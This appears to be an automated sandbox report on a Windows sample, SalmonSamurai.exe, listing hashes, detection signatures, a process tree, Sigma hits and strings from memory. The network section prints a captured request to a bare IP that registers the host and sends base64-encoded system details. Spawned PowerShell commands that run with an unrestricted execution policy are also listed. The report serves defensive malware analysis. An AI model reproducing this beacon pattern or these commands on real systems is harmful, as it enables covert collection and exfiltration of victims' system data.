Windows Analysis Report
SalmonSamurai.exe

Overview

General Information

Sample name: SalmonSamurai.exe
Analysis ID: 1579955
MD5: 4ce4a1f912d0b9840a7f568454c6c45a
SHA1: bbf41f3dee85e038f1cb4965269bb0f06b3bb27a
SHA256: 83679dfd6331a0a0d829c0f3aed5112b69a7024ff1ceebf7179ba5c2b4d21fc5

Detection

Score: 42
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 33
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Drops large PE files
Loading BitLocker PowerShell Module
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • SalmonSamurai.exe (PID: 2344 cmdline: "C:\Users\user\Desktop\SalmonSamurai.exe" MD5: 4CE4A1F912D0B9840A7F568454C6C45A)
    • SalmonSamurai.exe (PID: 3964 cmdline: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe MD5: 6EA18AE76085155E2681CCA92745A9AF)
      • cmd.exe (PID: 1912 cmdline: C:\Windows\system32\cmd.exe /d /s /c "chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 1168 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 3824 cmdline: C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1588 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1732 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1848 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SalmonSamurai.exe (PID: 2840 cmdline: "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 6EA18AE76085155E2681CCA92745A9AF)
      • SalmonSamurai.exe (PID: 2520 cmdline: "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2076 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 6EA18AE76085155E2681CCA92745A9AF)
      • cmd.exe (PID: 6836 cmdline: C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • findstr.exe (PID: 3672 cmdline: findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • powershell.exe (PID: 316 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1580 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2028 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4484 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2412 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7048 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6936 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7360 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7524 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7708 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7716 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7744 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7772 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7868 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7892 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7956 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentImage: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentProcessId: 3964, ParentProcessName: SalmonSamurai.exe, ProcessCommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, ProcessId: 1588, ProcessName: powershell.exe
Source: Process started; Author: _pete_0, TheDFIRReport; Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "chcp", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1912, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 1168, ProcessName: chcp.com
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentImage: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentProcessId: 3964, ParentProcessName: SalmonSamurai.exe, ProcessCommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, ProcessId: 1588, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: SalmonSamurai.exe ReversingLabs: Detection: 30%
Source: C:\Users\user\Desktop\SalmonSamurai.exe EXE: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exe
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe EXE: powershell.exe
Source: C:\Users\user\Desktop\SalmonSamurai.exe EXE: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe

Compliance

Source: C:\Users\user\Desktop\SalmonSamurai.exe EXE: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exe
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe EXE: powershell.exe
Source: C:\Users\user\Desktop\SalmonSamurai.exe EXE: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Source: SalmonSamurai.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SalmonSamurai.exe File created: C:\Users\user\AppData\Roaming\NsisExtracted\LICENSE.electron.txt
Source: SalmonSamurai.exe Static PE information: certificate valid
Source: SalmonSamurai.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData\Roaming\NsisExtracted\resources\app.asar
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData\Roaming\NsisExtracted\resources
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData\Roaming\NsisExtracted
Source: Joe Sandbox View IP Address: 172.64.41.3
Source: unknown TCP traffic detected without corresponding DNS query: 89.187.28.253
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /call.php?api=register&username=cmVwb3J0&userdata=OCBHQl9mYWxzZV8zV1JTTF90cnVlX0RQU19YSV9XaW5kb3dzIDEwIFByb185NiBtaW51dGVzICgwLjYwIGhvdXJzKV9DOlxVc2Vyc1xmcm9udGRlc2tfNTcxMzQ1X2Zyb250ZGVza19XaW5kb3dzX05UX3g2NF8xMC4wLjE5MDQ1X0M6XFVzZXJzXGZyb250ZGVza1xBcHBEYXRhXFJvYW1pbmdfQzpcVXNlcnNcRlJPTlREfjFcQXBwRGF0YVxMb2NhbFxUZW1wX0ZST05UREVTSy1QQ19fSW50ZWw2NCBGYW1pbHkgNiBNb2RlbCAxNDMgU3RlcHBpbmcgOCwgR2VudWluZUludGVsX0FNRDY0X0M6XzJfQzpcVXNlcnNcZnJvbnRkZXNrXEFwcERhdGFcUm9hbWluZ1xOc2lzRXh0cmFjdGVkXFNhbG1vblNhbXVyYWkuZXhl HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: 89.187.28.253Connection: close
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknown HTTP traffic detected: POST /dns-query HTTP/1.1
  Host: chrome.cloudflare-dns.com
  Connection: keep-alive
  Content-Length: 128
  Accept: application/dns-message
  Accept-Language: *
  User-Agent: Chrome
  Accept-Encoding: identity
  Content-Type: application/dns-message
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 23 Dec 2024 15:52:33 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://linkurystoragenorthus.blob.core.windows.net/static/favicon.icohttp://search.snapdo.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.icohttp://arianna.libero.it/search/ab
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nigma.ru/?s=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nigma.ru/themes/nigma/img/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nigma.ru/themes/nigma/img/favicon.icohttp://nigma.ru/?s=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nova.rambler.ru/search?query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nova.rambler.ru/suggest?v=3&query=
Source: SalmonSamurai.exe, 00000000.00000000.1256527562.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ok.hu/gfx/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ok.hu/gfx/favicon.icohttp://ok.hu/katalogus?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ok.hu/katalogus?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://pesquisa.sapo.pt/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://pesquisa.sapo.pt/livesapo?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://radce.centrum.cz/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://report-example.test/test
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.avg.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.avg.com/favicon.icohttp://search.avg.com/search?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.avg.com/search?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.babylon.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.babylon.com/favicon.icohttp://search.babylon.com/home?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.babylon.com/home?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.imesh.net/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.imesh.net/favicon.icohttp://search.imesh.net/music?hl=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.imesh.net/music?hl=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.iminent.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.iminent.com/Shared/Images/favicon_gl.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.iminent.com/Shared/Images/favicon_gl.icohttp://search.iminent.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.incredibar.com/favicon.ico
